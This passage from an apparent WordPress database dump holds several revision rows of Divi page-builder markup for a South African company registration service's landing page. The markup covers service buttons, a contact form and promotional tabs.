header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"6%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" _address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-22 16:17:11','2019-08-22 14:17:11','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33137,3,'2019-08-22 16:07:39','2019-08-22 14:07:39','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.27.3\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"3%\" animation_speed_curve=\"ease-in\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"-26px|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\" button_url=\"https://companyregistration.online/company-registrations/\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.1.0\" button_url=\"https://companyregistration.online/maintaining-your-company/\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.2.0\" button_url=\"https://companyregistration.online/tax-registrations\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.3.0\" button_url=\"https://companyregistration.online/combo-deals-2\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"6%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" _address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-22 16:07:39','2019-08-22 14:07:39','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33139,3,'2019-08-22 16:10:23','2019-08-22 14:10:23','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.27.3\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"3%\" animation_speed_curve=\"ease-in\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"-26px|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_url=\"https://companyregistration.online/company-registrations/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" 